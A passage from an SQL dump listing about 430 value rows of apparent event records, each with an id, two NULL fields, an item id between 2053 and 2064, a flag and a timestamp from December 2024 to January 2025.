(14934, NULL, NULL, 2063, 1, '2024-12-08 16:27:58'),
(14935, NULL, NULL, 2054, 1, '2024-12-08 20:11:09'),
(14936, NULL, NULL, 2063, 1, '2024-12-09 02:22:21'),
(14937, NULL, NULL, 2063, 1, '2024-12-09 16:46:36'),
(14938, NULL, NULL, 2063, 1, '2024-12-09 16:57:17'),
(14939, NULL, NULL, 2054, 1, '2024-12-09 17:08:47'),
(14940, NULL, NULL, 2063, 1, '2024-12-09 21:13:39'),
(14941, NULL, NULL, 2063, 1, '2024-12-10 06:33:11'),
(14942, NULL, NULL, 2054, 1, '2024-12-10 06:46:59'),
(14943, NULL, NULL, 2062, 1, '2024-12-10 07:43:08'),
(14944, NULL, NULL, 2062, 1, '2024-12-10 10:29:43'),
(14945, NULL, NULL, 2054, 1, '2024-12-10 12:16:45'),
(14946, NULL, NULL, 2053, 1, '2024-12-10 12:58:46'),
(14947, NULL, NULL, 2061, 1, '2024-12-10 15:09:24'),
(14948, NULL, NULL, 2064, 1, '2024-12-10 15:48:50'),
(14949, NULL, NULL, 2063, 1, '2024-12-10 18:15:47'),
(14950, NULL, NULL, 2063, 1, '2024-12-10 20:03:56'),
(14951, NULL, NULL, 2054, 1, '2024-12-10 20:57:04'),
(14952, NULL, NULL, 2058, 1, '2024-12-11 00:18:33'),
(14953, NULL, NULL, 2061, 1, '2024-12-11 00:23:33'),
(14954, NULL, NULL, 2062, 1, '2024-12-11 01:06:47'),
(14955, NULL, NULL, 2061, 1, '2024-12-11 05:45:10'),
(14956, NULL, NULL, 2061, 1, '2024-12-11 05:51:00'),
(14957, NULL, NULL, 2063, 1, '2024-12-11 08:13:44'),
(14958, NULL, NULL, 2054, 1, '2024-12-11 21:41:00'),
(14959, NULL, NULL, 2064, 1, '2024-12-12 03:14:09'),
(14960, NULL, NULL, 2061, 1, '2024-12-12 04:02:31'),
(14961, NULL, NULL, 2064, 1, '2024-12-12 04:34:11'),
(14962, NULL, NULL, 2054, 1, '2024-12-12 13:04:21'),
(14963, NULL, NULL, 2053, 1, '2024-12-13 04:28:38'),
(14964, NULL, NULL, 2064, 1, '2024-12-13 09:14:35'),
(14965, NULL, NULL, 2063, 1, '2024-12-13 20:19:26'),
(14966, NULL, NULL, 2061, 1, '2024-12-13 20:31:46'),
(14967, NULL, NULL, 2061, 1, '2024-12-14 00:49:27'),
(14968, NULL, NULL, 2062, 1, '2024-12-14 01:15:41'),
(14969, NULL, NULL, 2058, 1, '2024-12-14 05:05:48'),
(14970, NULL, NULL, 2059, 1, '2024-12-14 05:54:39'),
(14971, NULL, NULL, 2060, 1, '2024-12-14 12:02:42'),
(14972, NULL, NULL, 2054, 1, '2024-12-14 12:02:47'),
(14973, NULL, NULL, 2055, 1, '2024-12-14 12:02:48'),
(14974, NULL, NULL, 2059, 1, '2024-12-14 12:02:50'),
(14975, NULL, NULL, 2058, 1, '2024-12-14 12:02:51'),
(14976, NULL, NULL, 2063, 1, '2024-12-14 12:02:52'),
(14977, NULL, NULL, 2062, 1, '2024-12-14 12:02:53'),
(14978, NULL, NULL, 2061, 1, '2024-12-14 12:02:56'),
(14979, NULL, NULL, 2064, 1, '2024-12-14 12:02:59'),
(14980, NULL, NULL, 2053, 1, '2024-12-14 12:03:04'),
(14981, NULL, NULL, 2064, 1, '2024-12-14 13:18:17'),
(14982, NULL, NULL, 2054, 1, '2024-12-15 05:56:00'),
(14983, NULL, NULL, 2064, 1, '2024-12-15 17:22:20'),
(14984, NULL, NULL, 2054, 1, '2024-12-15 19:45:49'),
(14985, NULL, NULL, 2061, 1, '2024-12-16 00:50:15'),
(14986, NULL, NULL, 2058, 1, '2024-12-16 04:58:04'),
(14987, NULL, NULL, 2054, 1, '2024-12-16 05:43:14'),
(14988, NULL, NULL, 2062, 1, '2024-12-16 08:43:14'),
(14989, NULL, NULL, 2060, 1, '2024-12-16 09:05:37'),
(14990, NULL, NULL, 2063, 1, '2024-12-16 10:57:08'),
(14991, NULL, NULL, 2054, 1, '2024-12-16 14:48:25'),
(14992, NULL, NULL, 2058, 1, '2024-12-16 20:46:42'),
(14993, NULL, NULL, 2062, 1, '2024-12-17 13:54:12'),
(14994, NULL, NULL, 2060, 1, '2024-12-17 14:10:17'),
(14995, NULL, NULL, 2059, 1, '2024-12-17 18:07:20'),
(14996, NULL, NULL, 2059, 1, '2024-12-17 21:04:02'),
(14997, NULL, NULL, 2059, 1, '2024-12-18 02:43:43'),
(14998, NULL, NULL, 2053, 1, '2024-12-18 02:46:02'),
(14999, NULL, NULL, 2063, 1, '2024-12-18 04:41:45'),
(15000, NULL, NULL, 2059, 1, '2024-12-18 07:07:28'),
(15001, NULL, NULL, 2064, 1, '2024-12-18 07:33:53'),
(15002, NULL, NULL, 2064, 1, '2024-12-18 11:02:52'),
(15003, NULL, NULL, 2055, 1, '2024-12-18 13:03:33'),
(15004, NULL, NULL, 2060, 1, '2024-12-18 14:23:18'),
(15005, NULL, NULL, 2064, 1, '2024-12-18 14:41:06'),
(15006, NULL, NULL, 2054, 1, '2024-12-18 17:11:33'),
(15007, NULL, NULL, 2055, 1, '2024-12-18 19:17:54'),
(15008, NULL, NULL, 2061, 1, '2024-12-18 20:28:24'),
(15009, NULL, NULL, 2062, 1, '2024-12-18 22:16:17'),
(15010, NULL, NULL, 2064, 1, '2024-12-19 06:19:44'),
(15011, NULL, NULL, 2064, 1, '2024-12-19 06:20:23'),
(15012, NULL, NULL, 2062, 1, '2024-12-19 06:23:59'),
(15013, NULL, NULL, 2062, 1, '2024-12-19 06:24:11'),
(15014, NULL, NULL, 2053, 1, '2024-12-19 06:24:54'),
(15015, NULL, NULL, 2063, 1, '2024-12-19 06:26:27'),
(15016, NULL, NULL, 2063, 1, '2024-12-19 06:26:44'),
(15017, NULL, NULL, 2061, 1, '2024-12-19 06:26:55'),
(15018, NULL, NULL, 2061, 1, '2024-12-19 06:27:07'),
(15019, NULL, NULL, 2059, 1, '2024-12-19 06:27:27'),
(15020, NULL, NULL, 2059, 1, '2024-12-19 06:27:39'),
(15021, NULL, NULL, 2064, 1, '2024-12-19 06:28:32'),
(15022, NULL, NULL, 2058, 1, '2024-12-19 06:28:35'),
(15023, NULL, NULL, 2058, 1, '2024-12-19 06:28:47'),
(15024, NULL, NULL, 2055, 1, '2024-12-19 06:30:23'),
(15025, NULL, NULL, 2055, 1, '2024-12-19 06:30:35'),
(15026, NULL, NULL, 2054, 1, '2024-12-19 06:30:47'),
(15027, NULL, NULL, 2054, 1, '2024-12-19 06:30:58'),
(15028, NULL, NULL, 2060, 1, '2024-12-19 06:35:19'),
(15029, NULL, NULL, 2060, 1, '2024-12-19 06:35:31'),
(15030, NULL, NULL, 2054, 1, '2024-12-19 08:03:14'),
(15031, NULL, NULL, 2062, 1, '2024-12-19 09:44:26'),
(15032, NULL, NULL, 2061, 1, '2024-12-19 13:12:00'),
(15033, NULL, NULL, 2053, 1, '2024-12-20 01:54:11'),
(15034, NULL, NULL, 2062, 1, '2024-12-20 02:11:47'),
(15035, NULL, NULL, 2062, 1, '2024-12-20 04:07:52'),
(15036, NULL, NULL, 2054, 1, '2024-12-20 05:41:52'),
(15037, NULL, NULL, 2059, 1, '2024-12-20 05:42:25'),
(15038, NULL, NULL, 2061, 1, '2024-12-20 05:42:28'),
(15039, NULL, NULL, 2058, 1, '2024-12-20 05:42:31'),
(15040, NULL, NULL, 2062, 1, '2024-12-20 06:39:06'),
(15041, NULL, NULL, 2058, 1, '2024-12-20 12:03:24'),
(15042, NULL, NULL, 2053, 1, '2024-12-20 12:07:30'),
(15043, NULL, NULL, 2054, 1, '2024-12-21 00:03:59'),
(15044, NULL, NULL, 2055, 1, '2024-12-21 00:04:02'),
(15045, NULL, NULL, 2064, 1, '2024-12-21 00:04:11'),
(15046, NULL, NULL, 2063, 1, '2024-12-21 00:04:14'),
(15047, NULL, NULL, 2062, 1, '2024-12-21 00:04:16'),
(15048, NULL, NULL, 2060, 1, '2024-12-21 00:04:19'),
(15049, NULL, NULL, 2059, 1, '2024-12-21 00:04:21'),
(15050, NULL, NULL, 2061, 1, '2024-12-21 00:04:23'),
(15051, NULL, NULL, 2058, 1, '2024-12-21 00:04:27'),
(15052, NULL, NULL, 2053, 1, '2024-12-21 00:49:59'),
(15053, NULL, NULL, 2059, 1, '2024-12-21 04:11:47'),
(15054, NULL, NULL, 2058, 1, '2024-12-21 06:32:39'),
(15055, NULL, NULL, 2064, 1, '2024-12-22 02:28:51'),
(15056, NULL, NULL, 2055, 1, '2024-12-22 07:56:32'),
(15057, NULL, NULL, 2064, 1, '2024-12-22 07:56:37'),
(15058, NULL, NULL, 2061, 1, '2024-12-22 07:56:39'),
(15059, NULL, NULL, 2058, 1, '2024-12-22 07:56:42'),
(15060, NULL, NULL, 2059, 1, '2024-12-22 14:45:22'),
(15061, NULL, NULL, 2059, 1, '2024-12-22 16:41:28'),
(15062, NULL, NULL, 2060, 1, '2024-12-23 04:09:09'),
(15063, NULL, NULL, 2060, 1, '2024-12-23 04:43:20'),
(15064, NULL, NULL, 2063, 1, '2024-12-23 04:52:35'),
(15065, NULL, NULL, 2058, 1, '2024-12-23 05:13:50'),
(15066, NULL, NULL, 2061, 1, '2024-12-23 05:19:55'),
(15067, NULL, NULL, 2055, 1, '2024-12-23 05:48:21'),
(15068, NULL, NULL, 2061, 1, '2024-12-23 06:39:31'),
(15069, NULL, NULL, 2062, 1, '2024-12-23 07:04:53'),
(15070, NULL, NULL, 2054, 1, '2024-12-23 08:01:27'),
(15071, NULL, NULL, 2059, 1, '2024-12-23 08:15:54'),
(15072, NULL, NULL, 2064, 1, '2024-12-23 08:29:13'),
(15073, NULL, NULL, 2060, 1, '2024-12-23 10:15:10'),
(15074, NULL, NULL, 2059, 1, '2024-12-23 12:58:51'),
(15075, NULL, NULL, 2061, 1, '2024-12-23 13:06:32'),
(15076, NULL, NULL, 2058, 1, '2024-12-23 13:08:49'),
(15077, NULL, NULL, 2055, 1, '2024-12-23 13:18:03'),
(15078, NULL, NULL, 2054, 1, '2024-12-23 13:34:41'),
(15079, NULL, NULL, 2053, 1, '2024-12-23 16:26:26'),
(15080, NULL, NULL, 2054, 1, '2024-12-23 19:02:32'),
(15081, NULL, NULL, 2054, 1, '2024-12-23 21:45:31'),
(15082, NULL, NULL, 2061, 1, '2024-12-23 22:42:27'),
(15083, NULL, NULL, 2058, 1, '2024-12-24 01:36:57'),
(15084, NULL, NULL, 2053, 1, '2024-12-24 04:29:04'),
(15085, NULL, NULL, 2064, 1, '2024-12-24 19:15:13'),
(15086, NULL, NULL, 2055, 1, '2024-12-25 00:00:15'),
(15087, NULL, NULL, 2053, 1, '2024-12-25 07:41:43'),
(15088, NULL, NULL, 2064, 1, '2024-12-25 10:55:07'),
(15089, NULL, NULL, 2064, 1, '2024-12-25 10:58:31'),
(15090, NULL, NULL, 2064, 1, '2024-12-25 11:06:08'),
(15091, NULL, NULL, 2063, 1, '2024-12-25 11:13:27'),
(15092, NULL, NULL, 2053, 1, '2024-12-25 14:18:23'),
(15093, NULL, NULL, 2053, 1, '2024-12-25 15:48:59'),
(15094, NULL, NULL, 2064, 1, '2024-12-25 19:42:15'),
(15095, NULL, NULL, 2063, 1, '2024-12-25 22:26:55'),
(15096, NULL, NULL, 2064, 1, '2024-12-26 07:38:53'),
(15097, NULL, NULL, 2060, 1, '2024-12-26 07:46:38'),
(15098, NULL, NULL, 2061, 1, '2024-12-26 08:18:43'),
(15099, NULL, NULL, 2064, 1, '2024-12-26 09:24:48'),
(15100, NULL, NULL, 2064, 1, '2024-12-27 15:23:59'),
(15101, NULL, NULL, 2060, 1, '2024-12-27 16:59:42'),
(15102, NULL, NULL, 2062, 1, '2024-12-28 07:54:00'),
(15103, NULL, NULL, 2061, 1, '2024-12-28 08:00:45'),
(15104, NULL, NULL, 2054, 1, '2024-12-28 17:49:51'),
(15105, NULL, NULL, 2064, 1, '2024-12-29 11:34:30'),
(15106, NULL, NULL, 2058, 1, '2024-12-29 20:15:56'),
(15107, NULL, NULL, 2064, 1, '2024-12-30 04:40:18'),
(15108, NULL, NULL, 2058, 1, '2024-12-30 07:04:31'),
(15109, NULL, NULL, 2059, 1, '2024-12-30 21:04:35'),
(15110, NULL, NULL, 2059, 1, '2024-12-30 21:21:26'),
(15111, NULL, NULL, 2063, 1, '2024-12-30 23:10:14'),
(15112, NULL, NULL, 2060, 1, '2024-12-31 04:33:02'),
(15113, NULL, NULL, 2060, 1, '2024-12-31 08:34:08'),
(15114, NULL, NULL, 2059, 1, '2024-12-31 12:32:50'),
(15115, NULL, NULL, 2058, 1, '2024-12-31 21:08:34'),
(15116, NULL, NULL, 2061, 1, '2025-01-01 08:09:58'),
(15117, NULL, NULL, 2062, 1, '2025-01-01 14:53:41'),
(15118, NULL, NULL, 2061, 1, '2025-01-01 19:03:28'),
(15119, NULL, NULL, 2061, 1, '2025-01-01 20:08:30'),
(15120, NULL, NULL, 2064, 1, '2025-01-01 23:59:18'),
(15121, NULL, NULL, 2058, 1, '2025-01-01 23:59:18'),
(15122, NULL, NULL, 2064, 1, '2025-01-01 23:59:18'),
(15123, NULL, NULL, 2055, 1, '2025-01-01 23:59:18'),
(15124, NULL, NULL, 2064, 1, '2025-01-01 23:59:18'),
(15125, NULL, NULL, 2053, 1, '2025-01-01 23:59:21'),
(15126, NULL, NULL, 2061, 1, '2025-01-01 23:59:37'),
(15127, NULL, NULL, 2054, 1, '2025-01-01 23:59:56'),
(15128, NULL, NULL, 2062, 1, '2025-01-01 23:59:57'),
(15129, NULL, NULL, 2060, 1, '2025-01-01 23:59:58'),
(15130, NULL, NULL, 2059, 1, '2025-01-02 00:00:00'),
(15131, NULL, NULL, 2063, 1, '2025-01-02 00:00:01'),
(15132, NULL, NULL, 2053, 1, '2025-01-02 00:00:03'),
(15133, NULL, NULL, 2053, 1, '2025-01-02 00:00:35'),
(15134, NULL, NULL, 2053, 1, '2025-01-02 00:00:37'),
(15135, NULL, NULL, 2053, 1, '2025-01-02 00:00:39'),
(15136, NULL, NULL, 2053, 1, '2025-01-02 00:00:40'),
(15137, NULL, NULL, 2059, 1, '2025-01-02 01:41:37'),
(15138, NULL, NULL, 2063, 1, '2025-01-02 01:59:47'),
(15139, NULL, NULL, 2060, 1, '2025-01-02 02:59:45'),
(15140, NULL, NULL, 2063, 1, '2025-01-02 06:24:29'),
(15141, NULL, NULL, 2064, 1, '2025-01-02 06:51:54'),
(15142, NULL, NULL, 2064, 1, '2025-01-02 07:51:36'),
(15143, NULL, NULL, 2054, 1, '2025-01-02 09:07:23'),
(15144, NULL, NULL, 2060, 1, '2025-01-02 09:10:07'),
(15145, NULL, NULL, 2063, 1, '2025-01-02 09:20:08'),
(15146, NULL, NULL, 2058, 1, '2025-01-02 09:46:30'),
(15147, NULL, NULL, 2055, 1, '2025-01-02 10:33:53'),
(15148, NULL, NULL, 2064, 1, '2025-01-02 13:45:23'),
(15149, NULL, NULL, 2060, 1, '2025-01-02 15:37:45'),
(15150, NULL, NULL, 2063, 1, '2025-01-02 15:49:29'),
(15151, NULL, NULL, 2058, 1, '2025-01-02 16:20:34'),
(15152, NULL, NULL, 2062, 1, '2025-01-02 16:53:12'),
(15153, NULL, NULL, 2060, 1, '2025-01-02 17:27:38'),
(15154, NULL, NULL, 2063, 1, '2025-01-02 17:47:14'),
(15155, NULL, NULL, 2058, 1, '2025-01-02 18:38:53'),
(15156, NULL, NULL, 2055, 1, '2025-01-02 19:21:03'),
(15157, NULL, NULL, 2054, 1, '2025-01-02 20:09:18'),
(15158, NULL, NULL, 2055, 1, '2025-01-02 20:16:39'),
(15159, NULL, NULL, 2064, 1, '2025-01-02 21:06:01'),
(15160, NULL, NULL, 2058, 1, '2025-01-02 22:33:06'),
(15161, NULL, NULL, 2061, 1, '2025-01-02 22:33:19'),
(15162, NULL, NULL, 2059, 1, '2025-01-02 22:33:29'),
(15163, NULL, NULL, 2060, 1, '2025-01-02 22:33:41'),
(15164, NULL, NULL, 2062, 1, '2025-01-02 22:33:49'),
(15165, NULL, NULL, 2063, 1, '2025-01-02 22:33:58'),
(15166, NULL, NULL, 2064, 1, '2025-01-02 22:34:06'),
(15167, NULL, NULL, 2055, 1, '2025-01-02 22:35:08'),
(15168, NULL, NULL, 2054, 1, '2025-01-02 22:35:16'),
(15169, NULL, NULL, 2053, 1, '2025-01-02 22:35:26'),
(15170, NULL, NULL, 2054, 1, '2025-01-02 23:07:54'),
(15171, NULL, NULL, 2059, 1, '2025-01-02 23:26:37'),
(15172, NULL, NULL, 2058, 1, '2025-01-02 23:52:52'),
(15173, NULL, NULL, 2061, 1, '2025-01-02 23:53:02'),
(15174, NULL, NULL, 2059, 1, '2025-01-02 23:53:12'),
(15175, NULL, NULL, 2060, 1, '2025-01-02 23:53:22'),
(15176, NULL, NULL, 2062, 1, '2025-01-02 23:53:30'),
(15177, NULL, NULL, 2063, 1, '2025-01-02 23:53:38'),
(15178, NULL, NULL, 2064, 1, '2025-01-02 23:53:47'),
(15179, NULL, NULL, 2055, 1, '2025-01-02 23:54:53'),
(15180, NULL, NULL, 2054, 1, '2025-01-02 23:55:01'),
(15181, NULL, NULL, 2053, 1, '2025-01-02 23:55:10'),
(15182, NULL, NULL, 2054, 1, '2025-01-02 23:57:59'),
(15183, NULL, NULL, 2060, 1, '2025-01-03 00:26:30'),
(15184, NULL, NULL, 2063, 1, '2025-01-03 00:36:18'),
(15185, NULL, NULL, 2058, 1, '2025-01-03 01:02:15'),
(15186, NULL, NULL, 2055, 1, '2025-01-03 01:55:07'),
(15187, NULL, NULL, 2062, 1, '2025-01-03 07:31:02'),
(15188, NULL, NULL, 2060, 1, '2025-01-03 12:30:05'),
(15189, NULL, NULL, 2063, 1, '2025-01-03 12:43:06'),
(15190, NULL, NULL, 2061, 1, '2025-01-03 13:07:34'),
(15191, NULL, NULL, 2058, 1, '2025-01-03 13:14:15'),
(15192, NULL, NULL, 2055, 1, '2025-01-03 14:05:10'),
(15193, NULL, NULL, 2062, 1, '2025-01-03 16:16:10'),
(15194, NULL, NULL, 2054, 1, '2025-01-03 17:55:56'),
(15195, NULL, NULL, 2059, 1, '2025-01-03 18:16:20'),
(15196, NULL, NULL, 2064, 1, '2025-01-03 18:31:46'),
(15197, NULL, NULL, 2060, 1, '2025-01-03 20:02:14'),
(15198, NULL, NULL, 2063, 1, '2025-01-03 20:13:07'),
(15199, NULL, NULL, 2059, 1, '2025-01-03 20:32:07'),
(15200, NULL, NULL, 2058, 1, '2025-01-03 20:44:14'),
(15201, NULL, NULL, 2055, 1, '2025-01-03 21:41:37'),
(15202, NULL, NULL, 2060, 1, '2025-01-04 02:48:03'),
(15203, NULL, NULL, 2063, 1, '2025-01-04 02:57:49'),
(15204, NULL, NULL, 2058, 1, '2025-01-04 03:23:47'),
(15205, NULL, NULL, 2055, 1, '2025-01-04 04:14:55'),
(15206, NULL, NULL, 2061, 1, '2025-01-04 04:54:18'),
(15207, NULL, NULL, 2063, 1, '2025-01-04 07:48:03'),
(15208, NULL, NULL, 2059, 1, '2025-01-04 08:01:28'),
(15209, NULL, NULL, 2064, 1, '2025-01-04 08:15:36'),
(15210, NULL, NULL, 2058, 1, '2025-01-04 18:28:15'),
(15211, NULL, NULL, 2062, 1, '2025-01-05 06:41:37'),
(15212, NULL, NULL, 2058, 1, '2025-01-05 09:58:04'),
(15213, NULL, NULL, 2061, 1, '2025-01-05 12:04:58'),
(15214, NULL, NULL, 2061, 1, '2025-01-05 15:00:20'),
(15215, NULL, NULL, 2061, 1, '2025-01-05 16:40:24'),
(15216, NULL, NULL, 2059, 1, '2025-01-05 22:35:57'),
(15217, NULL, NULL, 2061, 1, '2025-01-05 23:44:14'),
(15218, NULL, NULL, 2059, 1, '2025-01-06 04:33:59'),
(15219, NULL, NULL, 2064, 1, '2025-01-06 05:09:11'),
(15220, NULL, NULL, 2061, 1, '2025-01-06 05:23:40'),
(15221, NULL, NULL, 2061, 1, '2025-01-06 06:37:41'),
(15222, NULL, NULL, 2062, 1, '2025-01-06 07:49:11'),
(15223, NULL, NULL, 2064, 1, '2025-01-06 09:36:14'),
(15224, NULL, NULL, 2062, 1, '2025-01-06 11:30:04'),
(15225, NULL, NULL, 2063, 1, '2025-01-06 17:49:10'),
(15226, NULL, NULL, 2053, 1, '2025-01-06 18:57:45'),
(15227, NULL, NULL, 2064, 1, '2025-01-06 19:52:10'),
(15228, NULL, NULL, 2053, 1, '2025-01-07 05:04:52'),
(15229, NULL, NULL, 2063, 1, '2025-01-07 05:06:04'),
(15230, NULL, NULL, 2058, 1, '2025-01-07 05:24:45'),
(15231, NULL, NULL, 2060, 1, '2025-01-07 05:51:55'),
(15232, NULL, NULL, 2054, 1, '2025-01-07 06:48:47'),
(15233, NULL, NULL, 2063, 1, '2025-01-07 10:02:33'),
(15234, NULL, NULL, 2062, 1, '2025-01-07 11:35:29'),
(15235, NULL, NULL, 2063, 1, '2025-01-07 17:55:23'),
(15236, NULL, NULL, 2053, 1, '2025-01-07 18:57:19'),
(15237, NULL, NULL, 2063, 1, '2025-01-07 19:28:35'),
(15238, NULL, NULL, 2055, 1, '2025-01-07 21:20:26'),
(15239, NULL, NULL, 2060, 1, '2025-01-07 22:42:15'),
(15240, NULL, NULL, 2060, 1, '2025-01-07 22:59:45'),
(15241, NULL, NULL, 2064, 1, '2025-01-07 23:39:02'),
(15242, NULL, NULL, 2054, 1, '2025-01-08 00:04:46'),
(15243, NULL, NULL, 2055, 1, '2025-01-08 01:36:50'),
(15244, NULL, NULL, 2062, 1, '2025-01-08 04:34:25'),
(15245, NULL, NULL, 2060, 1, '2025-01-08 05:54:27'),
(15246, NULL, NULL, 2059, 1, '2025-01-08 07:31:47'),
(15247, NULL, NULL, 2064, 1, '2025-01-08 09:49:15'),
(15248, NULL, NULL, 2060, 1, '2025-01-08 15:06:23'),
(15249, NULL, NULL, 2055, 1, '2025-01-08 15:37:55'),
(15250, NULL, NULL, 2058, 1, '2025-01-08 15:39:55'),
(15251, NULL, NULL, 2061, 1, '2025-01-08 16:03:50'),
(15252, NULL, NULL, 2063, 1, '2025-01-08 18:30:52'),
(15253, NULL, NULL, 2053, 1, '2025-01-08 19:00:21'),
(15254, NULL, NULL, 2055, 1, '2025-01-09 03:38:19'),
(15255, NULL, NULL, 2054, 1, '2025-01-09 04:51:20'),
(15256, NULL, NULL, 2060, 1, '2025-01-09 05:58:10'),
(15257, NULL, NULL, 2062, 1, '2025-01-09 11:28:58'),
(15258, NULL, NULL, 2061, 1, '2025-01-09 12:08:14'),
(15259, NULL, NULL, 2064, 1, '2025-01-09 15:20:17'),
(15260, NULL, NULL, 2063, 1, '2025-01-09 17:51:36'),
(15261, NULL, NULL, 2053, 1, '2025-01-09 18:58:41'),
(15262, NULL, NULL, 2060, 1, '2025-01-10 04:11:03'),
(15263, NULL, NULL, 2058, 1, '2025-01-10 04:51:28'),
(15264, NULL, NULL, 2060, 1, '2025-01-10 05:49:44'),
(15265, NULL, NULL, 2058, 1, '2025-01-10 06:08:11'),
(15266, NULL, NULL, 2064, 1, '2025-01-10 07:41:22'),
(15267, NULL, NULL, 2059, 1, '2025-01-10 10:35:36'),
(15268, NULL, NULL, 2062, 1, '2025-01-10 11:26:09'),
(15269, NULL, NULL, 2063, 1, '2025-01-10 12:16:46'),
(15270, NULL, NULL, 2062, 1, '2025-01-10 13:41:36'),
(15271, NULL, NULL, 2063, 1, '2025-01-10 16:20:03'),
(15272, NULL, NULL, 2062, 1, '2025-01-10 16:20:13'),
(15273, NULL, NULL, 2063, 1, '2025-01-10 17:53:22'),
(15274, NULL, NULL, 2053, 1, '2025-01-10 18:54:34'),
(15275, NULL, NULL, 2053, 1, '2025-01-10 23:47:28'),
(15276, NULL, NULL, 2060, 1, '2025-01-11 02:47:59'),
(15277, NULL, NULL, 2053, 1, '2025-01-11 03:03:56'),
(15278, NULL, NULL, 2054, 1, '2025-01-11 03:03:59'),
(15279, NULL, NULL, 2055, 1, '2025-01-11 03:04:03'),
(15280, NULL, NULL, 2064, 1, '2025-01-11 03:04:25'),
(15281, NULL, NULL, 2063, 1, '2025-01-11 03:04:28'),
(15282, NULL, NULL, 2062, 1, '2025-01-11 03:04:31'),
(15283, NULL, NULL, 2060, 1, '2025-01-11 03:04:34'),
(15284, NULL, NULL, 2059, 1, '2025-01-11 03:04:36'),
(15285, NULL, NULL, 2061, 1, '2025-01-11 03:04:39'),
(15286, NULL, NULL, 2058, 1, '2025-01-11 03:04:42'),
(15287, NULL, NULL, 2060, 1, '2025-01-11 05:53:49'),
(15288, NULL, NULL, 2062, 1, '2025-01-11 11:33:14'),
(15289, NULL, NULL, 2064, 1, '2025-01-11 14:57:21'),
(15290, NULL, NULL, 2063, 1, '2025-01-11 17:46:15'),
(15291, NULL, NULL, 2053, 1, '2025-01-11 18:56:43'),
(15292, NULL, NULL, 2063, 1, '2025-01-12 05:38:35'),
(15293, NULL, NULL, 2060, 1, '2025-01-12 05:53:41'),
(15294, NULL, NULL, 2061, 1, '2025-01-12 06:43:43'),
(15295, NULL, NULL, 2064, 1, '2025-01-12 08:47:48'),
(15296, NULL, NULL, 2060, 1, '2025-01-12 10:04:54'),
(15297, NULL, NULL, 2062, 1, '2025-01-12 11:29:32'),
(15298, NULL, NULL, 2060, 1, '2025-01-12 14:52:42'),
(15299, NULL, NULL, 2055, 1, '2025-01-12 15:32:56'),
(15300, NULL, NULL, 2063, 1, '2025-01-12 17:45:48'),
(15301, NULL, NULL, 2053, 1, '2025-01-12 18:59:51'),
(15302, NULL, NULL, 2053, 1, '2025-01-12 19:00:12'),
(15303, NULL, NULL, 2053, 1, '2025-01-12 19:00:36'),
(15304, NULL, NULL, 2053, 1, '2025-01-12 19:01:00'),
(15305, NULL, NULL, 2053, 1, '2025-01-12 19:01:25'),
(15306, NULL, NULL, 2053, 1, '2025-01-12 19:01:48'),
(15307, NULL, NULL, 2053, 1, '2025-01-12 19:02:12'),
(15308, NULL, NULL, 2053, 1, '2025-01-12 19:02:37'),
(15309, NULL, NULL, 2053, 1, '2025-01-12 19:03:01'),
(15310, NULL, NULL, 2053, 1, '2025-01-12 19:03:25'),
(15311, NULL, NULL, 2058, 1, '2025-01-13 00:39:03'),
(15312, NULL, NULL, 2053, 1, '2025-01-13 04:06:33'),
(15313, NULL, NULL, 2062, 1, '2025-01-13 04:38:33'),
(15314, NULL, NULL, 2060, 1, '2025-01-13 05:56:26'),
(15315, NULL, NULL, 2062, 1, '2025-01-13 11:28:46'),
(15316, NULL, NULL, 2061, 1, '2025-01-13 17:11:31'),
(15317, NULL, NULL, 2063, 1, '2025-01-13 17:50:04'),
(15318, NULL, NULL, 2053, 1, '2025-01-13 18:55:38'),
(15319, NULL, NULL, 2061, 1, '2025-01-13 19:00:59'),
(15320, NULL, NULL, 2060, 1, '2025-01-14 05:54:03'),
(15321, NULL, NULL, 2061, 1, '2025-01-14 09:54:03'),
(15322, NULL, NULL, 2062, 1, '2025-01-14 11:36:50'),
(15323, NULL, NULL, 2061, 1, '2025-01-14 12:02:32'),
(15324, NULL, NULL, 2062, 1, '2025-01-14 12:02:39'),
(15325, NULL, NULL, 2063, 1, '2025-01-14 12:02:41'),
(15326, NULL, NULL, 2064, 1, '2025-01-14 12:02:46'),
(15327, NULL, NULL, 2053, 1, '2025-01-14 12:02:55'),
(15328, NULL, NULL, 2064, 1, '2025-01-14 12:43:55'),
(15329, NULL, NULL, 2054, 1, '2025-01-14 17:24:32'),
(15330, NULL, NULL, 2054, 1, '2025-01-14 17:31:24'),
(15331, NULL, NULL, 2063, 1, '2025-01-14 17:53:27'),
(15332, NULL, NULL, 2053, 1, '2025-01-14 18:57:40'),
(15333, NULL, NULL, 2054, 1, '2025-01-15 02:34:25'),
(15334, NULL, NULL, 2055, 1, '2025-01-15 03:14:09'),
(15335, NULL, NULL, 2064, 1, '2025-01-15 03:14:21'),
(15336, NULL, NULL, 2063, 1, '2025-01-15 03:14:26'),
(15337, NULL, NULL, 2062, 1, '2025-01-15 03:14:30'),
(15338, NULL, NULL, 2060, 1, '2025-01-15 03:14:33'),
(15339, NULL, NULL, 2060, 1, '2025-01-15 05:54:35'),
(15340, NULL, NULL, 2062, 1, '2025-01-15 11:33:55'),
(15341, NULL, NULL, 2059, 1, '2025-01-15 14:25:54'),
(15342, NULL, NULL, 2064, 1, '2025-01-15 20:50:05'),
(15343, NULL, NULL, 2060, 1, '2025-01-16 02:47:18'),
(15344, NULL, NULL, 2060, 1, '2025-01-16 08:13:26'),
(15345, NULL, NULL, 2063, 1, '2025-01-16 08:22:49'),
(15346, NULL, NULL, 2058, 1, '2025-01-16 08:47:05'),
(15347, NULL, NULL, 2055, 1, '2025-01-16 09:36:32'),
(15348, NULL, NULL, 2061, 1, '2025-01-16 11:23:45'),
(15349, NULL, NULL, 2062, 1, '2025-01-16 12:25:56'),
(15350, NULL, NULL, 2064, 1, '2025-01-16 13:32:56'),
(15351, NULL, NULL, 2054, 1, '2025-01-16 14:15:04'),
(15352, NULL, NULL, 2059, 1, '2025-01-16 14:33:32'),
(15353, NULL, NULL, 2064, 1, '2025-01-16 14:46:24'),
(15354, NULL, NULL, 2064, 1, '2025-01-16 17:27:09'),
(15355, NULL, NULL, 2058, 1, '2025-01-17 00:51:12'),
(15356, NULL, NULL, 2061, 1, '2025-01-17 01:29:37'),
(15357, NULL, NULL, 2060, 1, '2025-01-17 01:45:47'),
(15358, NULL, NULL, 2063, 1, '2025-01-17 01:54:46'),
(15359, NULL, NULL, 2058, 1, '2025-01-17 02:18:02'),
(15360, NULL, NULL, 2055, 1, '2025-01-17 03:03:27'),
(15361, NULL, NULL, 2060, 1, '2025-01-17 03:30:48'),
